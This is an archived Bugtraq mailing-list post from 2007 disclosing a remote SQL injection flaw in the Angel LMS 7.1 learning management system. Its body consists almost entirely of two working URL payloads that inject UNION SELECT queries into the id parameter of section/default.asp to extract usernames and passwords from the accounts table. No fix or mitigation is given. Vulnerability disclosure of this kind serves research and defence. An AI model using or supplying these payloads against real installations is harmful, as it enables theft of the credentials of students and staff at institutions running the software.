Angel LMS 7.1 - Remote SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Angel LMS 7.1 - Remote SQL Injection
From: Guns@xxxxxxxxx
Date: 1 Mar 2007 16:06:06 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# Angel LMS 7.1 Remote SQL Injection
# by Guns

#All User Accounts#
http://[Angel Root 
Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"

#Account Passwords#
http://[Angel Root 
Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"

Follow-Ups:
- Re: Angel LMS 7.1 - Remote SQL Injection
  - From: str0ke

Prev by Date: Comodo Bypassing settings protection using magic pipe Vulnerability
Next by Date: Serendipity unauthenticated SQL-Injection
Previous by thread: Comodo Bypassing settings protection using magic pipe Vulnerability
Next by thread: Re: Angel LMS 7.1 - Remote SQL Injection
Index(es):
- Date
- Thread